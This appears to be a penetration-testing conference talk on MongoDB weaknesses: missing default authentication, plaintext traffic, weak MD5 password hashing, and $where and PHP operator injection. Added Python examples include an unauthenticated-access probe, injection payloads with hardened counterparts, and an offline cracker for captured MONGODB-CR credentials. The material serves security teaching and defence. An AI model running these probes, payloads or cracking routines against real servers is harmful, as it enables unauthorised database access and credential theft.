Making Mongo Cry: NoSQL for Penetration Testers
Russell Butturini, tcstool@gmail.com, @tcstoolhax0r
DISCLAIMER
This presentation contains jokes from the movie Blazing Saddles. The presenter takes no responsibility if you haven’t
seen one of the greatest films ever made and find none of his jokes funny.
Let’s talk about Mongo…But not this Mongo…
THIS Mongo
However they’re kind of the same…
• Big
• Powerful
• Blindly trust input
• Do anything they're told
• Don't understand encryption
• 49% of LinkedIn member profiles mentioning NoSQL technologies reference MongoDB [1].
• Frequent releases with lots of big changes: "Generally, changes in the release series (e.g. 2.2 to 2.4) mark the introduction of new features that may break backwards compatibility" [2].
• 10Gen is oblivious to security issues: "…We were on with…the MongoDB guys talking about the security of the platform, and…it was really clear that they just didn't care, because their customers weren't asking for it." - Rich Mogull, Security Weekly episode 345 [3].

[1] http://www.mongodb.com/press/mongodb-certification-now-available-developers-and-dbas
[2] http://docs.mongodb.org/manual/release-notes/
[3] http://pauldotcom.com/wiki/index.php/Episode345
NoSQL Primer - Structure

| Traditional SQL | Mongo NoSQL     |
|-----------------|-----------------|
| Databases       | Databases       |
| Tables          | Collections     |
| Rows/Records    | Documents       |
| Columns/Types   | Key-Value pairs |
NoSQL Primer - Data

Traditional SQL:

| firstName (char) | lastName (varchar) | widgets (int) |
|------------------|--------------------|---------------|
| John             | Doe                | 5             |

Mongo NoSQL:

{"firstname" : "John", "lastname" : "Doe", "widgets" : 5}
or
{"firstname" : "John", "lastname" : "Doe", "widgets" : "five"}
or
{"firstname" : "John", "lastname" : "Doe", "widgets" : 5, "foo" : "bar"}

All three are valid documents in the same collection: nothing forces the type of widgets or the set of keys.
NoSQL Primer - Queries

Traditional SQL:
SELECT email FROM users WHERE username = 'joe';

Mongo NoSQL:
db.users.find({"username" : "joe"}, {"email" : 1})
The Good
• Built for performance
• Highly scalable
• Dynamic and flexible
The Bad
• No standards between NoSQL platforms (you have to choose the right DB for the right job)
• Security is weak and inconsistently applied
The Disturbing
• No authentication required by default
• Weak or plaintext password storage
• Cleartext network communication from client to server
• No data encryption
• "Use this only in trusted environments" (yeah right)
• Reliance on the clients/drivers for security/functionality
NoSQL=No Auth (at least by default)
• Shodan: 33,575 Mongo default management ports exposed to the Internet (Feb 2014, Project Un1c0rn has more!)
• How many have the default of no authentication on?
And…

Total: 33,575 servers
Unauthenticated: 18,979 (56.5%)
(Most of the rest were offline by the time they were checked, not protected by authentication)

RTFM: "The most effective way to reduce risk for MongoDB deployments is to run your entire MongoDB deployment, including all MongoDB components (i.e. mongod, mongos and application instances) in a trusted environment."
Conclusion
At least 18,979 people believe the Internet is a trusted environment.
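How a count like the one above is produced, as an added example that is not part of the deck and not NoSQLMap's code: a probe that speaks the legacy MongoDB wire protocol directly, sends {listDatabases: 1} to admin.$cmd with no credentials, and classifies the reply. A server that answers with a database list has no authentication at all; one that answers ok: 0 with a "not authorized" errmsg (code 13) has it enabled. The BSON and message framing are written by hand rather than with pymongo so the same functions run offline against constructed replies; the host/port handling, the script name and the demo replies are assumptions for the example. Caveat: OP_QUERY is the message of the 2.x era the deck covers. MongoDB 5.1 and later accept it only for the hello/isMaster handshake, so a current server returns an "Unsupported OP_QUERY" error and the "refused" result must not be read as authentication being on.

```python
import socket
import struct
import sys

OP_REPLY = 1
OP_QUERY = 2004   # legacy opcode; 5.1+ only accepts it for hello/isMaster

# Minimal BSON: just the types a command document and its reply use.
def bson_encode(doc):
    body = b""
    for name, value in doc.items():
        key = name.encode("utf-8") + b"\x00"
        if isinstance(value, bool):          # bool before int: bool is an int subclass
            body += b"\x08" + key + (b"\x01" if value else b"\x00")
        elif isinstance(value, int):
            if -2**31 <= value < 2**31:
                body += b"\x10" + key + struct.pack("<i", value)
            else:
                body += b"\x12" + key + struct.pack("<q", value)
        elif isinstance(value, float):
            body += b"\x01" + key + struct.pack("<d", value)
        elif isinstance(value, str):
            s = value.encode("utf-8") + b"\x00"
            body += b"\x02" + key + struct.pack("<i", len(s)) + s
        elif isinstance(value, dict):
            body += b"\x03" + key + bson_encode(value)
        elif isinstance(value, list):        # arrays are documents keyed "0", "1", ...
            body += b"\x04" + key + bson_encode({str(i): v for i, v in enumerate(value)})
        else:
            raise TypeError("unsupported type %r" % type(value))
    return struct.pack("<i", len(body) + 5) + body + b"\x00"

def bson_decode(buf, offset=0):
    """Decode one document at offset; return (dict, offset just past it)."""
    end = offset + struct.unpack_from("<i", buf, offset)[0]
    pos, doc = offset + 4, {}
    while pos < end - 1:                     # end - 1 is the document's 0x00 terminator
        etype, pos = buf[pos], pos + 1
        name_end = buf.index(b"\x00", pos)
        name, pos = buf[pos:name_end].decode("utf-8"), name_end + 1
        if etype == 0x01:
            val, pos = struct.unpack_from("<d", buf, pos)[0], pos + 8
        elif etype == 0x02:                  # int32 length (incl. NUL) + bytes + NUL
            slen = struct.unpack_from("<i", buf, pos)[0]
            val, pos = buf[pos + 4:pos + 3 + slen].decode("utf-8"), pos + 4 + slen
        elif etype in (0x03, 0x04):
            val, pos = bson_decode(buf, pos)
            if etype == 0x04:
                val = [val[k] for k in sorted(val, key=int)]
        elif etype == 0x08:
            val, pos = buf[pos] == 1, pos + 1
        elif etype == 0x10:
            val, pos = struct.unpack_from("<i", buf, pos)[0], pos + 4
        elif etype == 0x12:
            val, pos = struct.unpack_from("<q", buf, pos)[0], pos + 8
        else:
            raise ValueError("unhandled BSON type 0x%02x in field %r" % (etype, name))
        doc[name] = val
    return doc, end

def build_command(db, command, request_id=1):
    """Wrap a command document in an OP_QUERY against <db>.$cmd (numberToReturn=-1: one result)."""
    body = struct.pack("<i", 0) + ("%s.$cmd" % db).encode("utf-8") + b"\x00"
    body += struct.pack("<ii", 0, -1) + bson_encode(command)
    return struct.pack("<iiii", 16 + len(body), request_id, 0, OP_QUERY) + body

def build_reply(doc, response_to=1):
    """Construct an OP_REPLY the way mongod frames it; only used for the offline demo."""
    body = struct.pack("<iqii", 0, 0, 0, 1) + bson_encode(doc)  # flags, cursorID, startingFrom, numberReturned
    return struct.pack("<iiii", 16 + len(body), 99, response_to, OP_REPLY) + body

def parse_reply(msg):
    """Return the first document of an OP_REPLY (16-byte header + 20 bytes of reply fields)."""
    opcode = struct.unpack_from("<i", msg, 12)[0]
    if opcode != OP_REPLY:
        raise ValueError("expected OP_REPLY, got opcode %d" % opcode)
    return bson_decode(msg, 36)[0]

def classify(reply_doc):
    """'open' = listDatabases answered with no credentials at all; otherwise the server's reason."""
    if reply_doc.get("ok") == 1 and "databases" in reply_doc:
        return "open"
    return "refused: %s" % reply_doc.get("errmsg", "unexpected reply %r" % reply_doc)

def recv_exact(sock, n):
    data = b""
    while len(data) < n:
        chunk = sock.recv(n - len(data))
        if not chunk:
            raise ConnectionError("connection closed mid-message")
        data += chunk
    return data

def probe(host, port=27017, timeout=5):
    """Send {listDatabases: 1} without authenticating and classify the answer."""
    with socket.create_connection((host, port), timeout) as s:
        s.sendall(build_command("admin", {"listDatabases": 1}))
        head = recv_exact(s, 4)
        msg = head + recv_exact(s, struct.unpack("<i", head)[0] - 4)
    return classify(parse_reply(msg))

if __name__ == "__main__":
    if len(sys.argv) > 1:                    # python mongo_probe.py <host> [port]
        print(probe(sys.argv[1], int(sys.argv[2]) if len(sys.argv) > 2 else 27017))
    else:                                    # offline demo against constructed replies
        no_auth = build_reply({"databases": [{"name": "admin", "sizeOnDisk": 83886080.0, "empty": False}], "ok": 1.0})
        auth_on = build_reply({"ok": 0.0, "errmsg": "not authorized on admin to execute command", "code": 13})
        print(classify(parse_reply(no_auth)), "|", classify(parse_reply(auth_on)))
```

Run with a host argument to probe a live server, or with none for the offline demo. The reply is classified on its content rather than on the connection succeeding, because a server with auth enabled still accepts the TCP connection and the command; it only refuses to answer it.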
Pen Testing Fun

• /etc/mongod.conf - DB config
  – The best part: disable ALL authentication (except for the web interface, for some reason) by commenting out auth=true and kicking the service
• run() acts as a shell (on whatever host you launch the Mongo client from)
• Typing a shell helper's name without the parentheses prints the JavaScript it executes
• system.users - usernames and weak password hashes
• system.indexes - key fields for speedy searching (probably important stuff)
• TCP 28017 - web management interface on by default (before 2.6)
• An optional REST API, when enabled, allows querying databases through the web management interface
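The weak and the corrected form of the settings named on this slide, as an added before/after fragment that is not from the deck. The keys are the pre-2.6 mongod.conf ini syntax that "auth=true" refers to (2.6 added a YAML format that spells the same settings differently); the internal address is an assumption for the example.

```ini
# WEAK: how a box ends up after auth is commented out and the service "kicked" (pre-2.6 ini format)
#auth = true            # commented out: every connection to 27017 is an unauthenticated admin
rest = true             # REST API reachable through the web console on 28017
# bind_ip not set: listens on every interface, including the Internet-facing one

# HARDENED: the same file the way it should be shipped
auth = true             # credentials required on every connection
bind_ip = 127.0.0.1,10.0.0.5   # loopback plus the internal address the app servers use (assumed address)
nohttpinterface = true  # no web console on 28017 (2.6 disables it by default, older versions do not)
rest = false
```

Both halves only take effect after mongod is restarted, which is exactly why the "comment it out and kick the service" trick works: whoever can write that file and restart the daemon owns every database on the box.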
NoSQL = No Encryption

• Server/client communications (including authentication) occur in PLAIN TEXT
• Passwords are hashed with plain MD5; a nonce is only mixed in for the challenge over the wire, not for storage at rest
• Data encryption? You're on your own.

(More on this to come…)
NoSQL = No SQL Injection (not)

Changing syntax != no vulnerabilities

Traditional SQL injection:
' OR 1=1 --

MongoDB $where query injection (<= 2.2):
a'; return db.ddlkad.find(); var dummy='a

MongoDB $where query injection (<= 2.4):
a'; return this.adfjda != djakflkdkl; var dummy='a
or
a'; return 1=1; var dummy='a
or
a'; return true; var dummy='a
Client Issues

PHP - what you supply:
http://somesite.com/?id[$ne]=something

What PHP sees:
{"$ne" => "something"}

What MongoDB sees:
"Give me everything back that is not equal to 'something'"
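Both injection classes from the last two slides, as an added example that is not code from the deck or from NoSQLMap. The first pair shows the $where pattern: a handler that pastes input into server-side JavaScript, so the `a'; return true; var dummy='a` payload closes the string, returns a tautology and swallows the trailing quote, beside the hardened form that sends an exact-match filter and never evaluates JavaScript. The second part emulates PHP's bracket parsing of `id[$ne]=something` into a nested array, then shows the two checks a login handler needs: the credentials are scalar strings, and no key anywhere in the input starts with `$`. Field names, the query strings and the login shape are constructed for the example; a real handler compares a password hash rather than the password.

```python
import re
from urllib.parse import parse_qsl

# ---- $where injection: the application pastes input into server-side JavaScript ----
def build_where_filter_vulnerable(username):
    """The pattern the slide exploits: user input concatenated into a $where JavaScript string."""
    return {"$where": "this.username == '%s'" % username}

def build_where_filter_hardened(username):
    """Same lookup with no JavaScript at all: an exact-match filter the driver sends as BSON,
    so the input can only ever be compared as a value, never parsed as code."""
    if not isinstance(username, str):
        raise TypeError("username must be a plain string")
    return {"username": username}

# ---- Operator injection: PHP turns id[$ne]=x into a nested array the driver sends as an operator ----
def parse_php_query_string(qs):
    """Emulate PHP's $_GET handling of bracket syntax: 'id[$ne]=x' -> {'id': {'$ne': 'x'}}."""
    params = {}
    for key, value in parse_qsl(qs, keep_blank_values=True):
        parts = re.findall(r"[^\[\]]+", key)          # 'id[$ne]' -> ['id', '$ne']
        if not parts:
            continue
        node = params
        for part in parts[:-1]:
            node = node.setdefault(part, {})
        node[parts[-1]] = value
    return params

def contains_operator(value):
    """True if any key anywhere in the structure starts with '$', i.e. is a MongoDB operator."""
    if isinstance(value, dict):
        return any(k.startswith("$") or contains_operator(v) for k, v in value.items())
    if isinstance(value, list):
        return any(contains_operator(v) for v in value)
    return False

def is_literal_login(params):
    """The check a login handler should apply: both credentials are scalar strings, nothing nested."""
    return isinstance(params.get("username"), str) and isinstance(params.get("password"), str)

def build_login_filter(params):
    """Build the find() filter for a login form, refusing anything that is not a plain string."""
    if not is_literal_login(params) or contains_operator(params):
        raise ValueError("credentials must be plain strings, not operator documents")
    return {"username": params["username"], "password": params["password"]}

if __name__ == "__main__":
    attack = parse_php_query_string("username[$ne]=&password[$ne]=")   # classic auth bypass
    print(attack, "->", "rejected" if not is_literal_login(attack) else build_login_filter(attack))
    print(build_where_filter_vulnerable("a'; return true; var dummy='a")["$where"])
```

The type check matters as much as the operator check: a driver happily serialises whatever structure the web framework hands it, so the fix lives in the application, not in the database.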
Credit where Credit is Due
On 4/8/2014, MongoDB 2.6 was released:
• New authentication methods including certificates and external authentication sources.
• Web interface is disabled by default.
• Granular role based access control.
• Auditing of schema, replica sets, authentication/authorization, general operations.
• Encryption in transit over SSL.
• Encryption at rest provided by Gazzang at the database and field levels.
But…
• Still no authentication by default.
• The default distribution of MongoDB 2.6 does NOT contain support for SSL (recompile the whole thing locally or buy the enterprise version for 7,500 bucks).
• Gazzang encryption at rest isn't free either.
• Password hashing is still using the same weak algorithm as previous versions.
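The "weak algorithm" from the "NoSQL = No Encryption" slide and this one, as an added example that is not part of the deck or of NoSQLMap: the MONGODB-CR scheme of MongoDB 2.x. The stored value in system.users is pwd = MD5("user:mongo:password"), unsalted beyond the username and with no work factor; on the wire the client asks for a nonce with {getnonce: 1} (in cleartext) and answers with key = MD5(nonce + user + pwd). The nonce stops replay, but a dump of system.users and a sniffed exchange both reduce to the same offline MD5 dictionary attack. The username, password, nonce and wordlist are constructed for the demo. MongoDB 3.0 replaced MONGODB-CR with SCRAM-SHA-1 and 4.0 removed it, so this applies to the versions the deck covers.

```python
import hashlib

def mongodb_cr_pwd_digest(username, password):
    """What MongoDB 2.x stores in system.users as "pwd": hex MD5 of "<user>:mongo:<password>".
    The only "salt" is the username, so the same password for the same user always hashes alike."""
    return hashlib.md5(("%s:mongo:%s" % (username, password)).encode("utf-8")).hexdigest()

def mongodb_cr_client_key(nonce, username, pwd_digest):
    """The "key" field of the authenticate command: hex MD5 of nonce + user + pwd digest.
    The nonce came back from {getnonce: 1} in cleartext, so a sniffer has every input but the password."""
    return hashlib.md5(("%s%s%s" % (nonce, username, pwd_digest)).encode("utf-8")).hexdigest()

def crack_stored_digest(username, stored_pwd, wordlist):
    """Offline attack on a system.users entry: the password whose digest matches, else None."""
    for candidate in wordlist:
        if mongodb_cr_pwd_digest(username, candidate) == stored_pwd:
            return candidate
    return None

def crack_sniffed_auth(nonce, username, key, wordlist):
    """Offline attack on a captured getnonce/authenticate exchange: two MD5s per guess."""
    for candidate in wordlist:
        digest = mongodb_cr_pwd_digest(username, candidate)
        if mongodb_cr_client_key(nonce, username, digest) == key:
            return candidate
    return None

if __name__ == "__main__":
    # Constructed sample: what a capture of the legacy auth exchange would contain (nonce is made up).
    user, nonce = "appuser", "2d4b7d7ea1f3c9b0"
    captured_key = mongodb_cr_client_key(nonce, user, mongodb_cr_pwd_digest(user, "Summer2014"))
    wordlist = ["password", "mongo", "Summer2014", "letmein"]
    print("system.users pwd:", mongodb_cr_pwd_digest(user, "Summer2014"))
    print("from sniffed exchange:", crack_sniffed_auth(nonce, user, captured_key, wordlist))
```

Two unsalted MD5 computations per candidate is the whole cost of a guess, which is why a wordlist attack on either artefact finishes in seconds; the nonce only prevents the captured key from being replayed, it adds nothing to the guessing cost.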
NoSQLMap
• Project home page: www.nosqlmap.net
• Automate all this stuff we just talked about and more.
• Always looking for more help!!!
Final Thoughts
• NoSQL databases can be a great tool, but you have to understand what you get.
• Devs can (and will) make the same mistakes they’ve been making for years.
• The default settings will get left on.
• Good application layer security is key since the database platform doesn't provide any.
Questions?
NoSQLMap home page: www.nosqlmap.net
Project mailbox:[email protected]
Me: @tcstoolhax0r, tcstool@gmail.com